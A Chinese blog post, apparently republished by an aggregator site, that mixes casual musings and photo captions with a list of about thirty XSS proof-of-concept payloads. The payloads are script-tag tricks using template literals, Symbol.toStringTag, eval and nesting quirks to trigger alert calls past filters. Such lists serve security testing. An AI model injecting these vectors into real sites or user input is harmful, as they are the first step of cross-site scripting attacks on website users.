瞎扯与xss

Posted me记录

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了瞎扯与xss相关的知识,希望对你有一定的参考价值。

瞎扯

发了,最近知道一些事情,想了想,还是不走纯技术了,尽量走些大的方向,或者生活趣事,娱乐新闻啥的,还有一句话特别想说,将军坟前无人问,戏子家事天下知,这种事情,真正的原因我想大家都知道,毕竟八卦戏子不会出事,对了还有就是这行在15年之前的没几个是科班出身的,大家都是慢慢打拼出来的,你的悲惨经历说出来毫无意义,与君共勉

by

me

胡说八道

遇见与分享

瞎扯与xss

地球某处

Tue.Oct.10

瞎扯与xss

此时此地

Wish you were here.


瞎扯与xss

朵奶奶家的菜地

菜国庆去玩的某个地方

瞎扯与xss

此时此地

Wish you were here.


瞎扯与xss

菜国庆去玩的某个地方

瞎扯与xss
瞎扯与xss
瞎扯与xss
瞎扯与xss

me运营社

那么以下就是送给各位看官的xss


在线任意进制转换计算

http://jinzhi.supfree.net/

http://tool.httpcn.com/Tool/JinZhiZhuanHuan.html


<script>[...`${alert(1)}`]</script>

<script>00000`${alert(1)}`</script>

<script>new new new `${alert(1)/*}`*/}`</script>

<script>a=`jackmasa<!--<script/\`;</script>

<input value="${alert(1)}`</script/">

<script>String.raw(a=alert(1),1,2)</script>

<script>a=`

${alert`1`}`</script>

<script>a=`${alert/*}`;

b=`*/(1)}`;</script>

<script>x=x=>x=>x=>x=>x=>x=>x=>alert(1);x()()()()()()()()</script>

<script>o={1.e+1111(){alert(arguments.callee);}};o[1e1111]()</script>

<script>eval(`ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(1)`);</script>

<script>x=(lol=alert(1),x=class x extends x{constructor(){alert(1)}}()()()()())</script>

<script>!class extends`${alert(1)}```{}</script>

<script>f=(x=alert(1))=>{}; f();</script>

<script>Array.prototype[Symbol.hasInstance]=eval;

"alert(1)" instanceof [];</script>

<script>

({[alert(1)](){}});

({get[alert(2)](){}});

({set[alert(3)](a){}});

</script>

<script>Array[Symbol.species].constructor('alert(1)')();</script>

<script> ({[alert`M`]:1})</script>

<script>Lol:Function`alert(1)```````````</script>

<script>new new new new new alert`1`</script>

<noscript><noscript></noscript><script>confirm(1)</script></noscript>

<script>alert``</script>

<script>!function(lol=alert(1)){}()</script>

<script>(function([a,b,c]=[1,2,3]){alert(`${a},${b},${c}`)})()</script>

<script>new alert`1`</script>

<script>-{'valueOf'(){setTimeout(this)},[Symbol['toStringTag']]:'=alert`1`'}</script>

<script>-{valueOf(){alert`:D`}}</script>

<script>delete []['__proto__']['toString'];

[]['__proto__'][Symbol.toStringTag]='=alert(1)';

eval([1,2,3]+'');</script>

<script>object=1;eval({[Symbol.toStringTag]: ',alert(1)'}+'')</script>


me运营社

瞎扯与xss

每一次遇见

都会有新的感想

以上是关于瞎扯与xss的主要内容,如果未能解决你的问题,请参考以下文章

做题经验(个人瞎扯淡)

可持久化瞎扯

瞎扯赚大钱的逻辑

记一次内部分享——瞎扯淡

《闲聊瞎扯系列:科目二考试日记》

Android异步载入全解析之开篇瞎扯淡